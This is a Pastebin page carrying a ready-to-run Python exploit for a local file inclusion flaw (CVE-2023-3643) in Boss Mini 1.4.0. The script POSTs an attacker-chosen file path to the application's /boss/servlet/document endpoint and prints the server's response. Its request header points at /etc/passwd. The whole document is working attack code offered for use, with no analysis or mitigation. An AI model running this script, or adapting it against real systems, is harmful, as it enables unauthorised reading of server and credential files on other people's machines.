Advertisement
FlyFar

Boss Mini 1.4.0 - Local File Inclusion - CVE-2023-3643

Mar 6th, 2024
858
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.84 KB | Cybersecurity | 0 0
  1. # Exploit Title: Boss Mini 1.4.0 - local file inclusion
  2. # Date: 07/12/2023
  3. # Exploit Author: [nltt0] (https://github.com/nltt-br))
  4. # CVE: CVE-2023-3643
  5.  
  6.  
  7. '''
  8. _____       _                              _____
  9. /  __ \    | |                            /  ___|
  10. | /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--.
  11. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
  12. | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
  13. \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
  14.                            __/ |                
  15.                           |___/                  
  16.  
  17. '''
  18.  
  19. from requests import post
  20. from urllib.parse import quote
  21. from argparse import ArgumentParser
  22.  
  23. try:
  24.     parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
  25.     parser.add_argument('--domain', required=True, help='Application domain')
  26.     parser.add_argument('--file', required=True, help='Local file')
  27.  
  28.     args = parser.parse_args()
  29.     host = args.domain
  30.     file = args.file
  31.     url = '{}/boss/servlet/document'.format(host)
  32.     file2 = quote(file, safe='')
  33.  
  34.     headers = {
  35.         'Host': host,
  36.         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
  37.         'Content-Type': 'application/x-www-form-urlencoded',
  38.         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
  39.         'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
  40.     }
  41.  
  42.  
  43.     data = {
  44.         'path': file2
  45.     }
  46.  
  47.     try:
  48.         req = post(url, headers=headers, data=data, verify=False)
  49.         if req.status_code == 200:
  50.             print(req.text)
  51.  
  52.     except Exception as e:
  53.         print('Error in {}'.format(e))  
  54.        
  55.  
  56. except Exception as e:
  57.     print('Error in {}'.format(e))
  58.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement